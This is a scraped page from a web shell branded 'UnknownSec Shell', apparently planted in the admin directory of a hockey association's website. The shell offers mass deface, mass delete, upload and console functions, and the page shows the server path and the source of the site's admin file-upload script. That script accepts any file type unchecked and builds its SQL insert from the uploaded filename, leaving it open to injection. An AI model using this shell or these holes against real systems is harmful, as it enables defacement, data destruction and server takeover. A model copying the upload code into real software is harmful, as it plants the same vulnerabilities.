shell bypass 403
UnknownSec Shell
:
/
home
/
hockeyalleppey
/
public_html
/
admin
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
fileupload.php
<?php session_start(); if(!isset($_SESSION["sess_user"])){ header("Location: login.php"); } ?> <!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Hockey Alleppey Association </title> <!-- plugins:css --> <link rel="stylesheet" href="vendors/feather/feather.css"> <link rel="stylesheet" href="vendors/mdi/css/materialdesignicons.min.css"> <link rel="stylesheet" href="vendors/ti-icons/css/themify-icons.css"> <link rel="stylesheet" href="vendors/typicons/typicons.css"> <link rel="stylesheet" href="vendors/simple-line-icons/css/simple-line-icons.css"> <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css"> <!-- endinject --> <!-- Plugin css for this page --> <link rel="stylesheet" href="vendors/datatables.net-bs4/dataTables.bootstrap4.css"> <link rel="stylesheet" href="js/select.dataTables.min.css"> <!-- End plugin css for this page --> <!-- inject:css --> <link rel="stylesheet" href="css/vertical-layout-light/style.css"> <!-- endinject --> <link rel="shortcut icon" href="images/logonew1.png" /> </head> <body> <div class="container-scroller"> <!-- partial:partials/_navbar.html --> <nav class="navbar default-layout col-lg-12 col-12 p-0 fixed-top d-flex align-items-top flex-row"> <div class="text-center navbar-brand-wrapper d-flex align-items-center justify-content-start"> <div class="me-3"> <button class="navbar-toggler navbar-toggler align-self-center" type="button" data-bs-toggle="minimize"> <span class="icon-menu"></span> </button> </div> <div> <a class="navbar-brand brand-logo" href="index.php"> <img src="images/logonew.png" alt="logo" / style="height:150px;"> </a> <a class="navbar-brand brand-logo-mini" href="index.php"> <img src="images/logonew.png" alt="logo" style="height:150px;"/> </a> </div> </div> </nav> <!-- partial --> <div class="container-fluid page-body-wrapper"> <!-- partial:partials/_settings-panel.html --> <!-- partial --> <!-- partial:partials/_sidebar.html --> <nav class="sidebar sidebar-offcanvas" id="sidebar"> <ul class="nav"> <li class="nav-item nav-category">Forms and Datas</li> <li class="nav-item"> <a class="nav-link" data-bs-toggle="collapse" href="#tables" aria-expanded="false" aria-controls="tables"> <i class="menu-icon mdi mdi-table"></i> <span class="menu-title">Gallery</span> <i class="menu-arrow"></i> </a> <div class="collapse" id="tables"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link" href="fileupload.php">Add Images</a></li> </ul> </div> <div class="collapse" id="tables"> <ul class="nav flex-column sub-menu"> <li class="nav-item"> <a class="nav-link" href="gallery-list.php">Gallery-List</a></li> </ul> </div> </li> <li class="nav-item"> <a class="nav-link" href="logout.php"> <i class="mdi mdi-grid-large menu-icon"></i> <span class="menu-title" >Signout</span> <!--<?=$_SESSION['sess_user'];?>!<a href="logout.php">Logout</a><!--> </a> </li> </ul> </nav> <?php include "dbConn.php"; // Using database connection file here if(isset($_POST["submit"])) { $var1 = rand(1111,9999); // generate random number in $var1 variable $var2 = rand(1111,9999); // generate random number in $var2 variable $var3 = $var1.$var2; // concatenate $var1 and $var2 in $var3 $var3 = md5($var3); // convert $var3 using md5 function and generate 32 characters hex number $fnm = $_FILES["image"]["name"]; // get the image name in $fnm variable $dst = "./all_image/".$var3.$fnm; // storing image path into the {all_images} folder with 32 characters hex number and file name $dst_db = "all_image/".$var3.$fnm; // storing image path into the database with 32 characters hex number and file name move_uploaded_file($_FILES["image"]["tmp_name"],$dst); // move image into the {all_images} folder with 32 characters hex number and image name $check = mysqli_query($db,"insert into tb_image(image) values('$dst_db')"); // executing insert query if($check) { echo '<script type="text/javascript"> alert("Data Inserted Seccessfully!"); </script>'; // alert message } else { echo '<script type="text/javascript"> alert("Error Uploading Data!"); </script>'; // when error occur } } ?> <!-- partial --> <div class="main-panel"> <div class="content-wrapper"> <div class="row"> <div class="col-md-6 grid-margin stretch-card"> <div class="card"> <div class="card-body"> <h4 class="card-title">Add-Images</h4> <form method="post" enctype="multipart/form-data" class="forms-sample"> <div class="form-group"> <label for="exampleInputUsername1"></label> <input type="file" class="form-control" id="exampleInputUsername1" placeholder="Username" name="image" Required> </div> <input type="submit" name="submit" class="btn btn-primary me-2"> <button class="btn btn-light">Cancel</button> </form> </div> </div> </div> </div> </div> <!-- content-wrapper ends --> <!-- partial:../../partials/_footer.html --> <footer class="footer"> <div class="d-sm-flex justify-content-center justify-content-sm-between"> <span class="float-none float-sm-right d-block mt-1 mt-sm-0 text-center">Copyright © 2022. All rights reserved Hokey Alleppey Association.</span> </div> </footer> <!-- partial --> </div> <!-- main-panel ends --> </div> <!-- page-body-wrapper ends --> </div> <!-- container-scroller --> <!-- plugins:js --> <script src="vendors/js/vendor.bundle.base.js"></script> <!-- endinject --> <!-- Plugin js for this page --> <script src="vendors/chart.js/Chart.min.js"></script> <script src="vendors/bootstrap-datepicker/bootstrap-datepicker.min.js"></script> <script src="vendors/progressbar.js/progressbar.min.js"></script> <!-- End plugin js for this page --> <!-- inject:js --> <script src="js/off-canvas.js"></script> <script src="js/hoverable-collapse.js"></script> <script src="js/template.js"></script> <script src="js/settings.js"></script> <script src="js/todolist.js"></script> <!-- endinject --> <!-- Custom js for this page--> <script src="js/dashboard.js"></script> <script src="js/Chart.roundedBarCharts.js"></script> <!-- End custom js for this page--> </body> </html>
© 2024 UnknownSec